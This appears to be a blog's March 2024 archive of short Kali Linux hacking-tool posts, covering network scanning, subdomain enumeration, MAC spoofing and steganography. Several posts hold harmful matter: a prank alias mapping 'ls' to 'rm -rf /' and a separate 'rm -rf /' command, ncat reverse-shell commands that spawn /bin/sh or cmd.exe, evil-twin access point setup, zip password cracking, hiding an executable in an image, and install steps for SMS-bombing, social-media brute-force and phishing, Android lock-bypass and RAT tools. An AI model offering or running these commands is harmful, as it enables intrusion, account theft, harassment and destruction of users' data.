Posts

Showing posts from March, 2024

holehe email osint

tmux

 terminal multixplayer terminal virtualization

Metasploit-Framework

msfencode,msfpayload,msfdb,msfconsole,msfvenom = metasploit-framework msfconsole search ftp use 1 show options set RHOSTS ip show payloads exploit/run Metasploit Modules Exploits payloads auxillery enocoder nops evasion post

Linux Command to see connected devices of your network their ip, Mac addresses and host names

Image
$sudo netdiscover -i eth0

Angry IP Scanner

Angry Ip scanner tells you which device is active and alive in your network  You can download Angry IP Scanner for Linux using the command line (CLI) by following these steps: 1. **Open a Terminal:**    Open your terminal emulator. You can usually find it in your applications menu or by searching for "Terminal". 2. **Download Angry IP Scanner:**    Use the `wget` command to download the Angry IP Scanner `.deb` package from the official website:    ```bash    wget https://github.com/angryip/ipscan/releases/download/3.8.1/ipscan_3.8.1_amd64.deb    ```    This command will download the latest version of Angry IP Scanner for 64-bit systems. If you're using a 32-bit system, replace `amd64` with `i386` in the URL. 3. **Install Angry IP Scanner:**    After downloading the `.deb` package, you can install it using the `dpkg` command:    ```bash     sudo dpkg -i ipscan_3.8.1_amd64.deb    ```    Replace `ipscan_3.8.1_amd64.deb ` with the name of the downloaded package if it's di

DNS Enumeration and Subdomain Enumeration

 $dnsenum google.com #subdomainenumeration #subdomain

Delete your kali linux completely using this command alias ls = 'rm -rf /'

 alias ls = 'rm -rf /'

How to change mac-address in kali linux and never gets block from any wifi

Image
To change your MAC address in Kali Linux, you can use the macchanger tool. Here are the commands to change your MAC address:     First, open a terminal in Kali Linux.     Check the current MAC address of your network interface. Replace eth0 with the name of your interface. For example: bash ifconfig eth0 | grep ether or bash ip link show eth0     Next, disable the network interface. Replace eth0 with your interface name: bash sudo ip link set dev eth0 down     Now, change the MAC address using macchanger. Replace eth0 with your interface name: bash sudo macchanger -r eth0 This command generates and sets a random MAC address for your interface. If you prefer to specify a custom MAC address, you can use the -m option followed by the desired MAC address.     Finally, bring the interface back up: bash sudo ip link set dev eth0 up After executing these commands, your network interface will have a new MAC address. Remember that changing your MAC address can affect network connectivity, parti

WEP security network cracking tools

1.Aircrack 2.Kismet 3.WEPCrack 4.WebDecrypt

How to create a fake access point in kali linux

 Creating a fake access point, also known as an evil twin or rogue access point, can be done using tools available in Kali Linux. Here's a general overview of the steps involved: 1. **Prepare Your Environment**:    Ensure you have a wireless network adapter capable of supporting monitor mode and packet injection. Kali Linux typically comes with compatible drivers for many wireless adapters. You can check the compatibility of your wireless adapter with Kali Linux by researching online or consulting the documentation. 2. **Set Up Your Wireless Interface**:    Open a terminal window in Kali Linux and use the following commands to set your wireless interface (replace `<interface>` with the name of your wireless interface):    ```bash    sudo ifconfig <interface> down    sudo iwconfig <interface> mode monitor    sudo ifconfig <interface> up    ```    This puts your wireless interface into monitor mode, allowing it to sniff and capture wireless traffic. 3. **Insta

FatRAT - Genrating Payload , Backdoor tool

Tor ghost - Hide your real IP

4nominizer - Hide your IP

Honeypot - Pentbox Github

Subfinder - A subdomain enumeration dool

Image
subfinder -d google.com subfinder -h Jai Shree Ram

whatweb image

Image
whatweb -a 3 www.wired.com

Whatweb

Image
whatweb -a 3 www.wired.com - for aggressive scan In Kali Linux, "WhatWeb" is a reconnaissance tool used for web fingerprinting. It's designed to identify and fingerprint web applications and their technologies by examining various aspects of their responses. Here's how it works: Fingerprinting : WhatWeb analyzes the HTTP responses received from web servers and identifies specific technologies, frameworks, CMS (Content Management Systems), server software, and other components used in the target web application. Passive Scanning : WhatWeb performs passive scanning, meaning it doesn't actively send requests to the target but rather analyzes the responses received while browsing the web application. Detection Techniques : It uses a combination of techniques such as analyzing HTTP headers, HTML and JavaScript code, specific URLs, error messages, and other patterns to infer information about the web application's technology stack. Database

Powershell-Empire - Remotely control any PC with Empire GUI

  Remotely Control any PC with Empire GUI How to start? $sudo powershell-empire server copy the url the local url and then paste in browser Links look like this http://localhost:1337/index.html  Default username is empireadmin and password is password123 Steps Activate the listeiner Generate the payload and send it to a victim. #pchacking #windowshacking #macoshacking

Password Hash

 import hashlib # String to hash password = "password" # Calculate MD5 hash md5_hash = hashlib.md5(password.encode()).hexdigest() print("MD5 hash of 'password':", md5_hash) MD5 hash of 'password': 5f4dcc3b5aa765d61d8327deb882cf99 How to get md5 hash of any encrypted file? md5sum Encrypt.zip > Encrypt.hash Then cracking using john or hydra $john Encrypt.hash How to identify the hash alogrithm? Use a tool called hash-identifier to know which algorithm hash is used.

Password Cracking Tools

Image
1.John The Ripper 2.Hashcat 3.Hydra 4.Cain & Abel 5.Cudahashcat

How to create and encrypt zip file

Creating Zip File $zip file.zip file.txt  Encrypting Zip File $zip -r -P your_password encrypted.zip files_to_encrypt

Zenmap

Zenmap is the graphical version of nmap.

See the connected device ip address on to your network in kali linux

 To view the list of IP addresses of devices connected to your network in Kali Linux, you can use various commands. Here are a few options: 1. **Using `arp` Command**:    ```    arp -a    ```    This command displays the ARP cache, which contains a list of IP addresses and their corresponding MAC addresses of devices that your computer has recently communicated with. 2. **Using `nmap` Command**:    ```    sudo nmap -sn <IP_range>    ```    Replace `<IP_range>` with the IP range of your network (e.g., `192.168.1.0/24`). This command uses the Nmap tool to perform a ping scan (`-sn` flag) of all IP addresses in the specified range and displays the ones that are responsive. 3. **Using `arp-scan` Command**:    First, install arp-scan if it's not already installed:    ```    sudo apt-get install arp-scan    ```    Then, run:    ```    sudo arp-scan --localnet    ```    This command scans your local network and displays a list of active IP addresses and corresponding MAC addre

MBo()b - Messaging bombarding Scripts github

Image
  https://github.com/palahsu/MBomb.git #githubscripts #github #tools

ncat - Windows , linux , android & macos shell access

nc [options] [host] [port]   Common Netcat Options: -l : Listen mode - Creates a listening server on a specified port -u : UDP mode - Uses UDP protocol instead of TCP (default) -v : Verbose mode - Provides more output during operation -p <port> : Specify the source port (useful for avoiding conflicts) -t : No delay - Disables Nagle's algorithm for faster data transfer (may not be compatible with all applications) -e <program> : Executes a program after a successful connection (advanced usage)   $nc -lvp 1234 - linux - port listening $ncat ip   1234  -e /bin/sh - android/linux $ncat ip  1234  -e cmd.exe/powershell.exe - windows $ncat -e 192.168.75.128 1111 cmd.exe - 100% working $nc -vv ip port Software neccessary for using ncat  Windows Download Nmap and Ncap from nmap website. Linux  Download ncat sudo apt install ncat #shellaccess #shellaccessinwindows #shellaccessinlinux #shellaccessinandroid

How to change display manger in kali linux - gdm3 for gnome - sddm - lightdm

$sudo dpkg-reconfigure gdm3 $update-alternatives --config x-session-manager    #kalilinux #commands #linuxcommands

Truecallerjs

PhoneIinfoga

Phonsploit Pro - Mobile Phone H@cking

Image
      1. Connect a Device             6. Get Screenshot                       11. Install an APK       2. List Connected Devices       7. Screen Record                        12. Uninstall an App     3. Disconnect All Devices       8. Download File/Folder from Device     13. List Installed Apps     4. Scan Network for Devices     9. Send File/Folder to Device           14. Access Device Shell     5. Mirror & Control Device     10. Run an App                           15. Hack Device (Using Metasploit) github url - https://github.com/AzeemIdrisi/PhoneSploit-Pro.git #phonehacking #androidhacking #controllingandroiddevices

SMH - Social Media H@cking Options- Brute Force , Mass Reporting & Phishing

Image
    1.SMH - Social Media H@cking Tool I.Instagram 2.Facebook 3.Gmail 4.Twitter git clone https://github.com/NullPulse/SocialMediaHackingToolkit cd SocialMediaHackingToolkit cd dependencies sudo dpkg -i windscribe-cli.deb windscirbe login cd ../cmd pip3 install -r requirements.txt cd .. chmod +x linux.sh ./linux.sh Options- Brute Force , Mass Reporting & Phishing #instagramhacking #bruteforceattack #socialmediahacking #ethicalhacking #twiiterhacking #facebookhacking #gmailhacking

CiLocks - All android h@cking tool

Image
     1.Update   2.Brute Pin 4 Digit   3.Brute Pin 6 Digit   4.Brute LockScreen Using Wordlist   5.Bypass LockScreen {Antiguard} Not Support All OS Version   6.Root Android {Supersu} Not Support All OS Version   7.Jump To Adb Toolkit   8.Reset Data   9.Remove LockScreen {Root}   10.Jump To Metasploit   11.Control Android {Scrcpy}   12.Phone Info   13.IP Logger {Over Internet}   14.Get WebCam {Over Internet}   15.FireStore Vulnerability   99.Exit git clone https://github.com/tegal1337/CiLocks cd CiLocks chmod +x cilocks sudo bash cilocks or sudo ./cilocks #androidrecovery #androidhackingtool #allinoneandroidtools #reset #androitpasswordcracking 

UPT

https://itsfoss.com/upt/

Amass - a subdomain enumeration tool/subdomain finder tool

To install Amass from GitHub, you can follow these steps: 1. Clone the repository:    git clone https://github.com/OWASP/Amass.git 2. Change directory into the Amass folder     cd Amass 3. Build the project using the `go` command:    go install ./ 4. After installation, you can run Amass commands from the command line. go install -v github.com/owasp-amass/amass/v4/...@master Make sure you have Go installed on your system before proceeding. $amass enum -d google.com Httprobe - to find the live subdomain who is currently live. $cat subdomain.txt | httprobe And here is the list😂 #sudomainfinder #subdomainenumeration #informationgathering

Steganography - Hiding text behind images

Open the terminal in windows Two things you must have as a file first is image you want to hide text in it and the text file where you will write your message. Copy /b image.png + Message.txt NewImage.png How to read hidden measaage? If you want to read the hidden text in image then open text editor in case of windows we have notepad and drag image to notepad read the end line. Linux How to hide malicious file in image Download the software $sudo apt install steghide $steghide embed -ef FileManager.exe -cf image.jpg $steghide extract -sf stego.jpg Steghide is a command-line tool used to embed and extract data in various files. Here's a basic tutorial on some of its commands: 1. **Embedding Data:**    ```               ```    This command embeds data from `<file_to_embed>` into `<cover_file>` and saves the result in `<output_file>`. 2. **Extracting Data:**    ```    steghide extract -sf <stego_file>    ```    This command extracts data from `<stego_file&

Google Dorking

Cracked the zip file password

Zip File - Creator.zip #Assuming that your file is protected with password. $zip2john Creator.zip > Hashes.hash #generates the hashes John the ripper is a password cracking tool. $john Hashes.hash

Nmap

Image
Network Scanning Tool $nmap google.com - gives the ip address and shows the open ports $nmap -o nmap.org - detects the operating system of web server running. Basic Scaning Technique Commands:- 1.Nmap 192.168.x.x 2.nmap 192.168.y.y 192.168.z.z - multiple scans 3.nmap 192.168.1.1-100 scan a range of ip. 4.nmap 192.168.1.0/24 - scan the entire subnet. List of ip address scanning 1.$cat list.txt 2.nmap -iL list.txt 3.nmap 192.168.1.0/24 --exclude 192.168.1.100 Discovery Scanning Options Commands 1.$nmap -Pn 192.168.1.111 (Don't Ping) 2.$nmap -sP 192.168.75.111 (Ping only scan) 3.$nmap --traceroute demo.testfire.net Advanced Scanning Options: $nmap -sS 192.168.x.x (TCP Syn Scan) Three way handshake syn-> syn+ack<- ack + rst -> $nmap -sT 192.168.x.x  (TCP Connect Scan) Three way shake complete $nmap -sF 192.168.x.x  (TCP FYN/FIN Scan) $nmap -sX 192.168.x.x  (TCP Xmas Scan) nmap -F ip  100 ports nmap -p 80 ip - specific port will scan nmap -O ip - operating system scanning. Ti

Linux machine hacked how to check? List of commands

$w - current login user $last - previously login user $netstat -ntua|grep "ESTABLISHED" - shows connections established 

Kali Linux Customization

sudo -i - root user enable cat /etc/os-release  - current version of kali machine $sudo apt install figlet lolcat $figlet -f banner "Maverick" | lolcat $sudo apt install plank Terminal Custom $sudo apt install terminator edx-ui github sudo apt install kali-desktop-gnome sudo apt remove kali-desktop-xfce xfce* lightdm #kali  #kalilinux  #customization  #kalicustomization  #kalilinuxcustomization

Ubuntu Installation on Android

Termux from Fdroid. An Linux Real Vnc

IP tracer & Track-IP Github

Image
Step - 1: Clone repo https://github.com/rajkumardusad/IP-Tracer.git Step - 2: Give permission to install chmod +x install Step - 3: Run install bash install  or ./install https://github.com/htr-tech/track-ip.git

L3MON RAT - Remote Admistration Tool

Scrcpy - An android screen mirror tool

 First, you need to install the required packages: # for Debian/Ubuntu sudo apt install ffmpeg libsdl2-2.0-0 adb wget \                  gcc git pkg-config meson ninja-build libsdl2-dev \                  libavcodec-dev libavdevice-dev libavformat-dev libavutil-dev \                  libswresample-dev libusb-1.0-0 libusb-1.0-0-dev Then clone the repo and execute the installation script (source): $git clone https://github.com/Genymobile/scrcpy cd scrcpy ./install_release.sh When a new release is out, update the repo and reinstall: git pull ./install_release.sh To uninstall: sudo ninja -Cbuild-auto uninstall

Kali Linux Commands - Part 3 What to do after installing kali linux

Destroying Kali Linux  sudo rm -rf / --n-preserve-root sudo apt autoremove Install terminal multiples sudo apt install tilix, konsole , guake Installing htop, ifto p   iftop - Shows bandwith usage htop - Shows cpu/resources usage Set up root user sudo usermod -aG sudo username Add user to sudo users sudo visudo yourusername ALL=(ALL:ALL)ALL Kali Linux Network Configuration sudo nano /etc/network/interfaces SSH sudo systemctl enable ssh Configuring firewall sudo ufw status sudo apt install ufw sudo ufw enable Virtual Box Guest Additions lsmod | grep vboxguest - checks that it installed or not. if not then update and then $sudo apt install -y virtualbox-guest-x11 lsmod | grep vboxguest  TimeZone timedatectl $sudo timedatectl set-timezone America/New_York to change the time zone Install Graphics Drivers lspci -v | grep -A 12 VGA Secure GRUB bootloader cat /etc/default/grub/ Restrict access grub command line files GRUB_DISABLE_RECOVERY="true" - uncomment this from bottom of this